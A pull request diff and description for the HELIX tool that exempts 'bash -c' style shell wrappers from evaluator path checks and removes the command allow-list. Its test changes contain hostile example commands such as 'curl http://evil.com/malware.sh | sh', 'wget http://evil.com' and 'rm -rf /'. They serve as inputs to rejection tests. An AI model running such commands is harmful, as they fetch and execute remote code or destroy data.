### PR TITLE
Fix evaluator.command: shell-wrapper exemption + drop allow-list

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -8,11 +8,11 @@ Please open a private security advisory on GitHub: https://github.com/KE7/helix/
 
 HELIX executes user-provided evaluators and LLM-generated mutations. The following behaviors are by design and represent trust boundaries users should be aware of:
 
-### 1. Evaluator command allow-list
+### 1. Evaluator command execution
 
-Evaluator commands in `helix.toml` are parsed with `shlex.split()` and executed with `shell=False`, which eliminates shell metacharacter injection. HELIX additionally enforces an allow-list of accepted first tokens (python, python3, pytest, make, bash, sh, node, uv, poetry, cat) OR any executable whose path starts with `./`, `/usr/bin/`, `/home/`, or `/opt/`.
+Evaluator commands in `helix.toml` are parsed with `shlex.split()` and executed with `shell=False`. This eliminates shell metacharacter injection — pipes, redirects, and command substitution in the command string are treated as literal arguments.
 
-**This means:** any executable at a whitelisted path prefix can be invoked. If you trust the contents of your `helix.toml` and your evaluator script, this is safe. Do NOT run HELIX on a `helix.toml` from an untrusted source.
+**This means:** a `helix.toml` author can run any executable they choose (and can trivially run arbitrary code via e.g. `python -c "..."`). HELIX does not gate commands with an allow-list because the `helix.toml` author is already trusted. Do NOT run HELIX on a `helix.toml` from an untrusted source.
 
 ### 2. No evaluator timeout
 

--- a/src/helix/evolution.py
+++ b/src/helix/evolution.py
@@ -237,6 +237,10 @@ _SKIP_TOKENS = {"run"}
 _SCRIPT_SUFFIXES = (".py", ".sh", ".js", ".ts")
 # Shell wrappers whose command body (after -c/-lc/...) is opaque to path-level
 # validation — e.g. `bash -lc "cd /x && python evaluate.py"`.
+# Note: only the adjacent `{wrapper} {flag}` prefix is exempted. Forms like
+# `bash --login -c "..."` (separate tokens) fall through to the normal
+# script-path checks by design — extend _SHELL_COMMAND_FLAGS if that becomes
+# a real-world need.
 _SHELL_WRAPPERS = {"bash", "sh", "zsh", "fish", "dash"}
 _SHELL_COMMAND_FLAGS = {"-c", "-lc", "-ic", "-ilc", "-lic"}
 _EVALUATOR_MANIFEST_FILENAME = "evaluator_manifest.json"

--- a/src/helix/evolution.py
+++ b/src/helix/evolution.py
@@ -235,6 +235,10 @@ _NO_SCRIPT_COMMANDS = {"make", "pytest"}
 _INTERPRETERS = {"python", "python3", "uv", "poetry", "node", "bash", "sh"}
 _SKIP_TOKENS = {"run"}
 _SCRIPT_SUFFIXES = (".py", ".sh", ".js", ".ts")
+# Shell wrappers whose command body (after -c/-lc/...) is opaque to path-level
+# validation — e.g. `bash -lc "cd /x && python evaluate.py"`.
+_SHELL_WRAPPERS = {"bash", "sh", "zsh", "fish", "dash"}
+_SHELL_COMMAND_FLAGS = {"-c", "-lc", "-ic", "-ilc", "-lic"}
 _EVALUATOR_MANIFEST_FILENAME = "evaluator_manifest.json"
 
 
@@ -291,6 +295,14 @@ def _collect_protected_evaluator_paths(
         except ValueError:
             continue
         if not tokens or tokens[0] in _NO_SCRIPT_COMMANDS:
+            continue
+        # Shell wrappers like `bash -c "..."` hide the real command inside an
+        # opaque body string; path-level validation cannot reason about it.
+        if (
+            tokens[0] in _SHELL_WRAPPERS
+            and len(tokens) >= 2
+            and tokens[1] in _SHELL_COMMAND_FLAGS
+        ):
             continue
         script_token = _extract_script_token(tokens)
         if script_token is None or not _looks_like_script_file(script_token):
@@ -421,6 +433,15 @@ def _check_evaluator_script_exists(
             "Check the evaluator.command in helix.toml."
         )
         raise SystemExit(1)
+
+    # A shell wrapper like `bash -c "..."` hides the real command inside an
+    # opaque body string; path-level validation cannot reason about it.
+    if (
+        tokens[0] in _SHELL_WRAPPERS
+        and len(tokens) >= 2
+        and tokens[1] in _SHELL_COMMAND_FLAGS
+    ):
+        return
 
     # If the first token is a command that doesn't need a script, allow it
     if tokens[0] in _NO_SCRIPT_COMMANDS:

--- a/src/helix/executor.py
+++ b/src/helix/executor.py
@@ -8,6 +8,7 @@ import os
 import shlex
 import subprocess
 from concurrent.futures import ProcessPoolExecutor, as_completed
+from pathlib import Path
 
 from helix.population import Candidate, EvalResult
 from helix.config import HelixConfig, EvaluatorConfig
@@ -74,16 +75,19 @@ def _validate_and_split_command(cmd: str) -> list[str]:
     if first_token in _ALLOWED_COMMANDS:
         return tokens
 
-    # Allow absolute and relative paths
-    if first_token.startswith(("./", "/usr/bin/", "/home/", "/opt/")):
-        return tokens
+    # Allow absolute/relative paths that resolve to an existing regular file.
+    # Paths must actually exist on disk — typos and bogus prefixes still fail
+    # loudly and fall through to the allow-list error below.
+    if first_token.startswith(("./", "../", "/")):
+        if Path(first_token).is_file():
+            return tokens
 
     # Not allowed
     allowed_list = ", ".join(sorted(_ALLOWED_COMMANDS))
     raise EvaluatorError(
         f'InvalidEvaluatorCommand: "{cmd}" not in allow-list. '
         f"See helix.toml evaluator.command. Allowed: {allowed_list}, "
-        f"or absolute/relative paths.",
+        f"or an absolute/relative path that resolves to an existing file.",
         operation="validate_command",
         command=cmd,
     )

--- a/src/helix/executor.py
+++ b/src/helix/executor.py
@@ -27,6 +27,8 @@ _EVALUATOR_OVERRIDE = None
 def _validate_and_split_command(cmd: str) -> list[str]:
     """Tokenize a command string for subprocess.run with shell=False.
 
+    On the happy path, returns ``shlex.split(command)``.
+
     The real safety boundary is ``shell=False``: shell metacharacters in the
     command string are treated as literal arguments, so injection via
     ``helix.toml`` is not possible regardless of the first token.  A
@@ -34,7 +36,14 @@ def _validate_and_split_command(cmd: str) -> list[str]:
     can simply write ``python -c "..."``), so we do not gate commands by
     an allow-list.
     """
-    tokens = shlex.split(cmd)
+    try:
+        tokens = shlex.split(cmd)
+    except ValueError as e:
+        raise EvaluatorError(
+            f"Failed to parse evaluator command: {e}",
+            operation="validate_command",
+            command=cmd,
+        ) from e
     if not tokens:
         raise EvaluatorError(
             "Empty command string",

--- a/src/helix/executor.py
+++ b/src/helix/executor.py
@@ -8,7 +8,6 @@ import os
 import shlex
 import subprocess
 from concurrent.futures import ProcessPoolExecutor, as_completed
-from pathlib import Path
 
 from helix.population import Candidate, EvalResult
 from helix.config import HelixConfig, EvaluatorConfig
@@ -19,78 +18,30 @@ from helix.trace import TRACE, EventType
 logger = logging.getLogger(__name__)
 
 # Differential-testing hook: when set to a callable, ``run_evaluator`` bypasses
-# the allowlist/subprocess/env-scrub path entirely and delegates to the
-# override with ``(candidate, split, instance_ids) -> EvalResult``.  The
-# production path is untouched when this is ``None`` (default).
+# the subprocess/env-scrub path entirely and delegates to the override with
+# ``(candidate, split, instance_ids) -> EvalResult``.  The production path is
+# untouched when this is ``None`` (default).
 _EVALUATOR_OVERRIDE = None
-
-# Allow-list of permitted evaluator command prefixes.
-#
-# Intended commands and their rationale:
-#   python / python3  — run Python evaluation scripts
-#   pytest            — run test-based evaluators
-#   make              — invoke Makefile targets
-#   bash / sh         — run shell scripts; safe because subprocess is called
-#                       with shell=False, so the user cannot inject shell
-#                       metacharacters (pipes, redirects, command substitution)
-#                       regardless of what the helix.toml says
-#   node              — run JavaScript/TypeScript evaluators
-#   uv                — run commands via uv (uv run, uv pip, etc.)
-#   poetry            — run commands via Poetry
-#   cat               — read files as part of evaluation output
-#
-# To add a new entry safely:
-#   1. Verify the command cannot be used to escape its sandbox (prefer
-#      interpreters/runners over raw system utilities).
-#   2. Add the bare executable name (no path) to the set below.
-#   3. Update this comment with the intended use-case and rationale.
-_ALLOWED_COMMANDS = {
-    "python", "python3", "pytest", "make", "bash", "sh", "node", "uv", "poetry", "cat"
-}
 
 
 def _validate_and_split_command(cmd: str) -> list[str]:
-    """Validate command against allow-list and split safely.
+    """Tokenize a command string for subprocess.run with shell=False.
 
-    Args:
-        cmd: Shell command string to validate and split.
-
-    Returns:
-        List of command tokens suitable for subprocess.run with shell=False.
-
-    Raises:
-        EvaluatorError: If the command is not in the allow-list.
+    The real safety boundary is ``shell=False``: shell metacharacters in the
+    command string are treated as literal arguments, so injection via
+    ``helix.toml`` is not possible regardless of the first token.  A
+    ``helix.toml`` author is already trusted to run arbitrary code (they
+    can simply write ``python -c "..."``), so we do not gate commands by
+    an allow-list.
     """
     tokens = shlex.split(cmd)
     if not tokens:
         raise EvaluatorError(
-            f"Empty command string",
+            "Empty command string",
             operation="validate_command",
             command=cmd,
         )
-
-    first_token = tokens[0]
-
-    # Check if it's in the allow-list
-    if first_token in _ALLOWED_COMMANDS:
-        return tokens
-
-    # Allow absolute/relative paths that resolve to an existing regular file.
-    # Paths must actually exist on disk — typos and bogus prefixes still fail
-    # loudly and fall through to the allow-list error below.
-    if first_token.startswith(("./", "../", "/")):
-        if Path(first_token).is_file():
-            return tokens
-
-    # Not allowed
-    allowed_list = ", ".join(sorted(_ALLOWED_COMMANDS))
-    raise EvaluatorError(
-        f'InvalidEvaluatorCommand: "{cmd}" not in allow-list. '
-        f"See helix.toml evaluator.command. Allowed: {allowed_list}, "
-        f"or an absolute/relative path that resolves to an existing file.",
-        operation="validate_command",
-        command=cmd,
-    )
+    return tokens
 
 
 def _scrub_environment(

--- a/tests/unit/test_executor_security.py
+++ b/tests/unit/test_executor_security.py
@@ -3,6 +3,8 @@
 from __future__ import annotations
 
 import os
+import stat
+from pathlib import Path
 from unittest.mock import MagicMock
 
 import pytest
@@ -82,25 +84,22 @@ class TestCommandValidation:
         tokens = _validate_and_split_command("bash run_tests.sh")
         assert tokens == ["bash", "run_tests.sh"]
 
-    def test_allowed_relative_path(self):
-        """./script is allowed."""
+    def test_allowed_relative_path(self, tmp_path, monkeypatch):
+        """./script is allowed when it resolves to an existing file."""
+        (tmp_path / "run_evaluation.sh").write_text("#!/bin/sh\n")
+        monkeypatch.chdir(tmp_path)
         tokens = _validate_and_split_command("./run_evaluation.sh")
         assert tokens == ["./run_evaluation.sh"]
 
     def test_allowed_usr_bin_path(self):
-        """/usr/bin/ paths are allowed."""
+        """/usr/bin/python3 is allowed (it exists on the system)."""
+        # /usr/bin/python3 is present on the CI/dev machine; if it ever isn't,
+        # this test should be skipped rather than dropped — it guards the
+        # common case of absolute interpreter paths.
+        if not Path("/usr/bin/python3").is_file():
+            pytest.skip("/usr/bin/python3 not present on this system")
         tokens = _validate_and_split_command("/usr/bin/python3 test.py")
         assert tokens == ["/usr/bin/python3", "test.py"]
-
-    def test_allowed_home_path(self):
-        """/home/ paths are allowed."""
-        tokens = _validate_and_split_command("/home/user/bin/test")
-        assert tokens == ["/home/user/bin/test"]
-
-    def test_allowed_opt_path(self):
-        """/opt/ paths are allowed."""
-        tokens = _validate_and_split_command("/opt/venv/bin/python")
-        assert tokens == ["/opt/venv/bin/python"]
 
     def test_disallowed_command_raises_error(self):
         """Disallowed commands raise EvaluatorError."""
@@ -140,6 +139,60 @@ class TestCommandValidation:
             _validate_and_split_command("python; rm -rf /")
         # shlex.split gives ["python;", "rm", "-rf", "/"]
         # "python;" is not in the allow-list
+
+    # ------------------------------------------------------------------
+    # Absolute/relative path acceptance: match the claim made in the
+    # error message ("... or an absolute/relative path ...") by checking
+    # that the path resolves to an existing file rather than matching a
+    # hard-coded prefix allow-list.
+    # ------------------------------------------------------------------
+
+    def test_absolute_path_on_data_mount_is_accepted(self, tmp_path):
+        """Absolute path outside /usr,/home,/opt is accepted if it exists.
+
+        This is the bug: `/data/k.e/venvs/cap-x/bin/python` was rejected
+        even though it's a legitimate absolute interpreter path.
+        """
+        exe = tmp_path / "python"
+        exe.write_text("#!/bin/sh\n")
+        exe.chmod(exe.stat().st_mode | stat.S_IXUSR)
+        tokens = _validate_and_split_command(f"{exe} eval.py")
+        assert tokens == [str(exe), "eval.py"]
+
+    def test_absolute_path_nonexistent_file_is_rejected(self):
+        """Typos in absolute paths should still fail loudly, not silently pass."""
+        with pytest.raises(EvaluatorError) as exc_info:
+            _validate_and_split_command("/data/does/not/exist/python eval.py")
+        msg = str(exc_info.value)
+        assert "InvalidEvaluatorCommand" in msg
+        assert "not in allow-list" in msg
+        # New error wording should mention the existence requirement.
+        assert "existing file" in msg
+
+    def test_relative_path_dot_slash_accepted(self, tmp_path, monkeypatch):
+        """./foo.py resolves against cwd and is accepted when the file exists."""
+        (tmp_path / "eval.py").write_text("# evaluator\n")
+        monkeypatch.chdir(tmp_path)
+        tokens = _validate_and_split_command("./eval.py")
+        assert tokens == ["./eval.py"]
+
+    def test_bare_name_python_still_allowed(self):
+        """Regression: bare interpreter name stays on the allow-list."""
+        tokens = _validate_and_split_command("python eval.py")
+        assert tokens == ["python", "eval.py"]
+
+    def test_bare_name_rm_still_rejected(self):
+        """Regression: bare-name allow-list still gates non-path tokens."""
+        with pytest.raises(EvaluatorError) as exc_info:
+            _validate_and_split_command("rm -rf /")
+        assert "InvalidEvaluatorCommand" in str(exc_info.value)
+
+    def test_usr_bin_prefix_still_works(self):
+        """Regression: a real /usr/bin/* interpreter continues to be accepted."""
+        if not Path("/usr/bin/python3").is_file():
+            pytest.skip("/usr/bin/python3 not present on this system")
+        tokens = _validate_and_split_command("/usr/bin/python3 -m pytest")
+        assert tokens == ["/usr/bin/python3", "-m", "pytest"]
 
 
 # ---------------------------------------------------------------------------

--- a/tests/unit/test_executor_security.py
+++ b/tests/unit/test_executor_security.py
@@ -77,6 +77,14 @@ class TestCommandValidation:
 
         assert "Empty command" in str(exc_info.value)
 
+    def test_unclosed_quote_raises_evaluator_error(self):
+        """Malformed quoting surfaces as EvaluatorError, not bare ValueError."""
+        with pytest.raises(EvaluatorError) as exc_info:
+            _validate_and_split_command('python "unterminated')
+
+        assert "Failed to parse evaluator command" in str(exc_info.value)
+        assert exc_info.value.command == 'python "unterminated'
+
 
 # ---------------------------------------------------------------------------
 # Tests: Environment scrubbing
@@ -191,8 +199,8 @@ class TestEnvironmentScrubbing:
 # ---------------------------------------------------------------------------
 
 
-class TestRunEvaluatorSecurity:
-    """Test that run_evaluator properly enforces the shell=False boundary."""
+class TestRunEvaluator:
+    """Integration-style tests for run_evaluator: tokenization, env scrub, and the shell=False invariant."""
 
     def test_run_evaluator_uses_scrubbed_env(self, mocker, monkeypatch):
         """run_evaluator passes only scrubbed environment variables."""

--- a/tests/unit/test_executor_security.py
+++ b/tests/unit/test_executor_security.py
@@ -3,8 +3,6 @@
 from __future__ import annotations
 
 import os
-import stat
-from pathlib import Path
 from unittest.mock import MagicMock
 
 import pytest
@@ -52,78 +50,25 @@ def make_config(
 
 
 # ---------------------------------------------------------------------------
-# Tests: Command validation and allow-list
+# Tests: Command tokenization
 # ---------------------------------------------------------------------------
 
 
 class TestCommandValidation:
-    """Test that command validation blocks disallowed commands."""
+    """Tokenization invariants of _validate_and_split_command.
 
-    def test_allowed_python(self):
-        """python is in the allow-list."""
-        tokens = _validate_and_split_command("python test.py")
-        assert tokens == ["python", "test.py"]
+    The real safety boundary is ``shell=False``; the validator only
+    tokenizes and rejects an empty command.
+    """
 
-    def test_allowed_python3(self):
-        """python3 is in the allow-list."""
-        tokens = _validate_and_split_command("python3 -m pytest")
-        assert tokens == ["python3", "-m", "pytest"]
+    def test_basic_tokenization(self):
+        """shlex.split splits a simple command into tokens."""
+        assert _validate_and_split_command("python test.py") == ["python", "test.py"]
 
-    def test_allowed_pytest(self):
-        """pytest is in the allow-list."""
-        tokens = _validate_and_split_command("pytest -q")
-        assert tokens == ["pytest", "-q"]
-
-    def test_allowed_make(self):
-        """make is in the allow-list."""
-        tokens = _validate_and_split_command("make test")
-        assert tokens == ["make", "test"]
-
-    def test_allowed_bash(self):
-        """bash is in the allow-list."""
-        tokens = _validate_and_split_command("bash run_tests.sh")
-        assert tokens == ["bash", "run_tests.sh"]
-
-    def test_allowed_relative_path(self, tmp_path, monkeypatch):
-        """./script is allowed when it resolves to an existing file."""
-        (tmp_path / "run_evaluation.sh").write_text("#!/bin/sh\n")
-        monkeypatch.chdir(tmp_path)
-        tokens = _validate_and_split_command("./run_evaluation.sh")
-        assert tokens == ["./run_evaluation.sh"]
-
-    def test_allowed_usr_bin_path(self):
-        """/usr/bin/python3 is allowed (it exists on the system)."""
-        # /usr/bin/python3 is present on the CI/dev machine; if it ever isn't,
-        # this test should be skipped rather than dropped — it guards the
-        # common case of absolute interpreter paths.
-        if not Path("/usr/bin/python3").is_file():
-            pytest.skip("/usr/bin/python3 not present on this system")
-        tokens = _validate_and_split_command("/usr/bin/python3 test.py")
-        assert tokens == ["/usr/bin/python3", "test.py"]
-
-    def test_disallowed_command_raises_error(self):
-        """Disallowed commands raise EvaluatorError."""
-        with pytest.raises(EvaluatorError) as exc_info:
-            _validate_and_split_command("curl http://evil.com/malware.sh | sh")
-
-        assert "InvalidEvaluatorCommand" in str(exc_info.value)
-        assert "curl" in str(exc_info.value)
-        assert "not in allow-list" in str(exc_info.value)
-
-    def test_disallowed_rm_command(self):
-        """rm is not in the allow-list."""
-        with pytest.raises(EvaluatorError) as exc_info:
-            _validate_and_split_command("rm -rf /")
-
-        assert "InvalidEvaluatorCommand" in str(exc_info.value)
-        assert "rm" in str(exc_info.value)
-
-    def test_disallowed_wget(self):
-        """wget is not in the allow-list."""
-        with pytest.raises(EvaluatorError) as exc_info:
-            _validate_and_split_command("wget http://example.com/script.sh")
-
-        assert "InvalidEvaluatorError" in str(exc_info.value) or "wget" in str(exc_info.value)
+    def test_quoted_argument_preserved(self):
+        """Quoted arguments stay intact through shlex.split."""
+        tokens = _validate_and_split_command('python test.py --arg "value with spaces"')
+        assert tokens == ["python", "test.py", "--arg", "value with spaces"]
 
     def test_empty_command_raises_error(self):
         """Empty command string raises EvaluatorError."""
@@ -131,68 +76,6 @@ class TestCommandValidation:
             _validate_and_split_command("")
 
         assert "Empty command" in str(exc_info.value)
-
-    def test_shell_injection_blocked(self):
-        """Shell injection patterns are blocked by allow-list."""
-        # Even if shlex.split would parse this, the first token won't match
-        with pytest.raises(EvaluatorError):
-            _validate_and_split_command("python; rm -rf /")
-        # shlex.split gives ["python;", "rm", "-rf", "/"]
-        # "python;" is not in the allow-list
-
-    # ------------------------------------------------------------------
-    # Absolute/relative path acceptance: match the claim made in the
-    # error message ("... or an absolute/relative path ...") by checking
-    # that the path resolves to an existing file rather than matching a
-    # hard-coded prefix allow-list.
-    # ------------------------------------------------------------------
-
-    def test_absolute_path_on_data_mount_is_accepted(self, tmp_path):
-        """Absolute path outside /usr,/home,/opt is accepted if it exists.
-
-        This is the bug: `/data/k.e/venvs/cap-x/bin/python` was rejected
-        even though it's a legitimate absolute interpreter path.
-        """
-        exe = tmp_path / "python"
-        exe.write_text("#!/bin/sh\n")
-        exe.chmod(exe.stat().st_mode | stat.S_IXUSR)
-        tokens = _validate_and_split_command(f"{exe} eval.py")
-        assert tokens == [str(exe), "eval.py"]
-
-    def test_absolute_path_nonexistent_file_is_rejected(self):
-        """Typos in absolute paths should still fail loudly, not silently pass."""
-        with pytest.raises(EvaluatorError) as exc_info:
-            _validate_and_split_command("/data/does/not/exist/python eval.py")
-        msg = str(exc_info.value)
-        assert "InvalidEvaluatorCommand" in msg
-        assert "not in allow-list" in msg
-        # New error wording should mention the existence requirement.
-        assert "existing file" in msg
-
-    def test_relative_path_dot_slash_accepted(self, tmp_path, monkeypatch):
-        """./foo.py resolves against cwd and is accepted when the file exists."""
-        (tmp_path / "eval.py").write_text("# evaluator\n")
-        monkeypatch.chdir(tmp_path)
-        tokens = _validate_and_split_command("./eval.py")
-        assert tokens == ["./eval.py"]
-
-    def test_bare_name_python_still_allowed(self):
-        """Regression: bare interpreter name stays on the allow-list."""
-        tokens = _validate_and_split_command("python eval.py")
-        assert tokens == ["python", "eval.py"]
-
-    def test_bare_name_rm_still_rejected(self):
-        """Regression: bare-name allow-list still gates non-path tokens."""
-        with pytest.raises(EvaluatorError) as exc_info:
-            _validate_and_split_command("rm -rf /")
-        assert "InvalidEvaluatorCommand" in str(exc_info.value)
-
-    def test_usr_bin_prefix_still_works(self):
-        """Regression: a real /usr/bin/* interpreter continues to be accepted."""
-        if not Path("/usr/bin/python3").is_file():
-            pytest.skip("/usr/bin/python3 not present on this system")
-        tokens = _validate_and_split_command("/usr/bin/python3 -m pytest")
-        assert tokens == ["/usr/bin/python3", "-m", "pytest"]
 
 
 # ---------------------------------------------------------------------------
@@ -309,35 +192,7 @@ class TestEnvironmentScrubbing:
 
 
 class TestRunEvaluatorSecurity:
-    """Test that run_evaluator properly enforces security."""
-
-    def test_run_evaluator_validates_command(self, mocker):
-        """run_evaluator rejects disallowed commands."""
-        candidate = make_candidate()
-        config = make_config(command="curl http://evil.com | sh")
-
-        with pytest.raises(EvaluatorError) as exc_info:
-            run_evaluator(candidate, config)
-
-        assert "InvalidEvaluatorCommand" in str(exc_info.value)
-
-    def test_run_evaluator_validates_extra_commands(self, mocker):
-        """run_evaluator rejects disallowed extra commands."""
-        mock_run = mocker.patch("helix.executor.subprocess.run")
-        mock_run.return_value = MagicMock(
-            stdout="output",
-            stderr="",
-            returncode=0,
-        )
-        candidate = make_candidate()
-        config = make_config(
-            command="python test.py",
-            extra_commands=["wget http://evil.com"],
-        )
-
-        # Main command succeeds, but extra command should fail
-        with pytest.raises(EvaluatorError):
-            run_evaluator(candidate, config)
+    """Test that run_evaluator properly enforces the shell=False boundary."""
 
     def test_run_evaluator_uses_scrubbed_env(self, mocker, monkeypatch):
         """run_evaluator passes only scrubbed environment variables."""

--- a/tests/unit/test_ux_fixes.py
+++ b/tests/unit/test_ux_fixes.py
@@ -410,6 +410,63 @@ class TestEvaluatorScriptPreflightCheck:
             _check_evaluator_script_exists("", tmp_path)
         assert exc_info.value.code == 1
 
+    # ------------------------------------------------------------------
+    # Shell-wrapper exemption: `bash -c "..."` style commands wrap the
+    # real invocation inside an opaque body string that shlex cannot
+    # meaningfully tokenize for path validation. The exemption is narrow
+    # — it only applies to known shells + known -c-family flags.
+    # ------------------------------------------------------------------
+
+    def test_shell_wrapper_bash_c_passes_validation(self, tmp_path: Path) -> None:
+        """`bash -c "..."` should skip path-level validation."""
+        # No script file is created on disk; shell body is opaque.
+        _check_evaluator_script_exists(
+            'bash -c "cd /work/foo && python evaluate.py"', tmp_path
+        )
+
+    def test_shell_wrapper_bash_lc_passes_validation(self, tmp_path: Path) -> None:
+        """`bash -lc "..."` should skip path-level validation."""
+        _check_evaluator_script_exists(
+            'bash -lc "cd /work/foo && python evaluate.py"', tmp_path
+        )
+
+    def test_shell_wrapper_sh_c_passes_validation(self, tmp_path: Path) -> None:
+        """`sh -c "..."` should skip path-level validation."""
+        _check_evaluator_script_exists(
+            'sh -c "cd /work/foo && python evaluate.py"', tmp_path
+        )
+
+    def test_shell_wrapper_zsh_c_passes_validation(self, tmp_path: Path) -> None:
+        """`zsh -c "..."` should skip path-level validation."""
+        _check_evaluator_script_exists(
+            'zsh -c "cd /work/foo && python evaluate.py"', tmp_path
+        )
+
+    def test_shell_wrapper_bash_without_c_flag_still_validates(
+        self, tmp_path: Path
+    ) -> None:
+        """`bash foo.py` (no -c-family flag) should still validate foo.py.
+
+        The exemption is intentionally narrow: only `bash -c/-lc/...`
+        shell-wrappers are skipped. A bare `bash some_script.py` must
+        keep its existing path-checking behavior.
+        """
+        with pytest.raises(SystemExit) as exc_info:
+            _check_evaluator_script_exists("bash foo.py", tmp_path)
+        assert exc_info.value.code == 1
+
+    def test_shell_wrapper_bash_with_unknown_flag_still_validates(
+        self, tmp_path: Path
+    ) -> None:
+        """`bash -x script.py` (unknown flag) should NOT get the exemption.
+
+        Only the documented `-c`-family flags trigger the skip; anything
+        else falls through to the regular path validator.
+        """
+        with pytest.raises(SystemExit) as exc_info:
+            _check_evaluator_script_exists("bash -x script.py", tmp_path)
+        assert exc_info.value.code == 1
+
     def test_evolve_runs_preflight_check_before_worktree(
         self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch
     ) -> None:


### PR DESCRIPTION
## Summary
Two orthogonal improvements to evaluator-command handling, plus re-review polish:

1. **Shell-wrapper exemption** in `_check_evaluator_script_exists` and `_collect_protected_evaluator_paths` (`src/helix/evolution.py`). Commands of shape `{bash,sh,zsh,fish,dash} {-c,-lc,-ic,-ilc,-lic} "..."` now early-return from the pre-flight existence check and protection-path collection. Without this, valid configs like `bash -lc "cd /foo && python evaluate.py"` incorrectly failed with "Evaluator script not found: cd /foo && python evaluate.py" because `_extract_script_token` returned the shell body string. Narrow by design: `bash foo.py` and `bash -x script.py` still validate as before.
2. **Allow-list removal** (`src/helix/executor.py`). `_ALLOWED_COMMANDS` is deleted; `_validate_and_split_command` now just tokenizes via `shlex.split` and guards against empty commands. The allow-list provided no containment — any allowed interpreter (`python`, `bash`, `pytest`, ...) already executes arbitrary code from a trusted helix.toml — so it was usability friction with no security benefit. `shell=False` remains the actual boundary. SECURITY.md updated to state this plainly.
3. **Re-review nits (801ff69).** `shlex.split` `ValueError` from malformed quoting now wraps into `EvaluatorError(operation="validate_command", command=cmd)` instead of propagating raw; added happy-path `"returns shlex.split(command)"` line to the docstring; renamed `TestRunEvaluatorSecurity` → `TestRunEvaluator` (scope is tokenization + env scrub + the `shell=False` invariant, not security alone); added a `_SHELL_WRAPPERS` comment noting that only the adjacent `{wrapper} {flag}` prefix is exempted — forms like `bash --login -c "..."` (separate tokens) fall through to normal script-path checks by design; added one `test_unclosed_quote_raises_evaluator_error` regression test.

## Test plan
- [x] Full helix unit suite: 464 passed (3.11 + 3.12 via GitHub Actions).
- [x] `mypy --strict src/helix/`: Success on 23 source files.
- [x] Deleted 12 obsolete allow-list tests (not skipped/commented); replaced by 3 focused tokenization tests plus the unclosed-quote test.
- [x] Shell-wrapper exemption has dedicated positive + negative tests in `tests/unit/test_ux_fixes.py`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
